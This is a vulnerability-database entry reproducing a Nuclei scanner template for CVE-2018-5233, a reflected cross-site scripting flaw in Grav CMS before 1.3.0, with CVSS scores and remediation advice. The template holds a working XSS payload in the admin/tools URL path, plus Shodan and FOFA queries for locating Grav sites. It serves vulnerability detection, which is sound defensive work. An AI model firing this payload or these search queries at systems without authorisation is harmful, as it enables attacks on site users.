Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-5233
HistoryJul 27, 2021 - 9:03 a.m.

Grav CMS <1.3.0 - Cross-Site Scripting

2021-07-2709:03:59
ProjectDiscovery
github.com
4
cve
cve2018
xss
grav
getgrav

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.003

Percentile

69.3%

Grav CMS before 1.3.0 is vulnerable to cross-site scripting via system/src/Grav/Common/Twig/Twig.php and allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools.
id: CVE-2018-5233

info:
  name: Grav CMS <1.3.0 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: |
    Grav CMS before 1.3.0 is vulnerable to cross-site scripting via system/src/Grav/Common/Twig/Twig.php and allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools.
  remediation: |
    Upgrade Grav CMS to version 1.3.0 or later, which includes proper input sanitization to mitigate the XSS vulnerability.
  reference:
    - https://sysdream.com/news/lab/2018-03-15-cve-2018-5233-grav-cms-admin-plugin-reflected-cross-site-scripting-xss-vulnerability/
    - http://www.openwall.com/lists/oss-security/2018/03/15/1
    - https://nvd.nist.gov/vuln/detail/CVE-2018-5233
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-5233
    cwe-id: CWE-79
    epss-score: 0.00294
    epss-percentile: 0.69184
    cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: getgrav
    product: grav_cms
    shodan-query:
      - html:"Grav CMS"
      - http.html:"grav cms"
    fofa-query: body="grav cms"
  tags: cve,cve2018,xss,grav,getgrav

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: body
        words:
          - '/themes/grav'
          - 'Grav Admin Login'
          - 'data-grav-'
        condition: or

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a00463044022039c462a8a512f96f87f6eca877264adfd40fa62d56e27db272b1a94174889fe2022020ed38db65838db0ff92d6edf60525c4672dd0bc5772977511d69659ca898210:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.003

Percentile

69.3%